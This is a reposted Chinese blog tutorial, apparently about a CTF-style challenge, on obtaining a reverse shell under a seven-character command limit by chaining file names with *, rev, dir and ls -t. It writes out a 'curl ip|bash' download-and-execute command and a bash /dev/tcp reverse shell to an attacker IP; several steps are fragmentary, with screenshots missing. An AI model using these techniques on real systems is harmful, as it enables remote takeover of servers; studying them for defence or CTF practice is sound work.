码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 限制命令长度如何反弹shell


    问题:限制命令在7句以内如何反弹shell

    先来看一个命令

    直接输入一个*,发现输出了hello_qf.来看一下如何实现

    在一个新的目录中,我们输入这样的命令就可以输出hello_qf了。因为输入*就是echo hello_qf

    于是输出了hello_qf.

    那我们再来看一下使用命令ls -l

    有两个方法:

    方法一:

    利用rev把字符串反过来。

    rev作用:把字符串头变成尾,尾变成头翻转

    test的内容

    this is test

    开始操作:

    >dir原因

    把 a 和 b 写到 c 里面

    dir a b>c

    执行了*>v,就是

    dir l- sl > v

    >v使用字母v的原因

    *v>x就是

    rev v

    方法二:

    待会使用反弹shell就是用这个方法,利用ls -t 的时间顺序来实现执行命令

    abde994abc1391e112c0a65c808d2eae.png

    反弹shell:

    首先要确立一个反弹shell的语句,因为我们要设置为这个文件名,所以要尽量简单,而且尽量少有那种奇怪的符号。于是确立这个语句:

    curl ip/shell.txt|bash

    shell.txt的内容就是反弹shell

    bash -i >& /dev/tcp/47.xxx.xxx.51/2333 0>&1

    但是这里面有一个'/'要避免,那我们就把这个shell.txt设置成默认页面,然后命令变成:

    curl ip|bash

     

    以上是命令

    到服务器看一眼:

    成功反弹shell

  • 相关阅读:
    面试突击51:为什么单例一定要加 volatile?
    3. hdfs概述与高可用原理
    Python图像处理丨带你认识图像量化处理及局部马赛克特效
    Stable Doodle:简单涂鸦一键变成艺术品
    JS THREE.js间隔执行函数
    对比学习下的跨模态语义对齐是最优的吗?---自适应稀疏化注意力对齐机制 IEEE Trans. MultiMedia
    rv1126-rv1109-NFS功能
    【LeetCode动态规划#12】详解买卖股票I~IV,经典dp题型
    【AGI】大模型 深度学习入门学习路径
    【Python】使用Shell通配符来匹配字符串
  • 原文地址:https://blog.csdn.net/qq_64201116/article/details/126178905
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号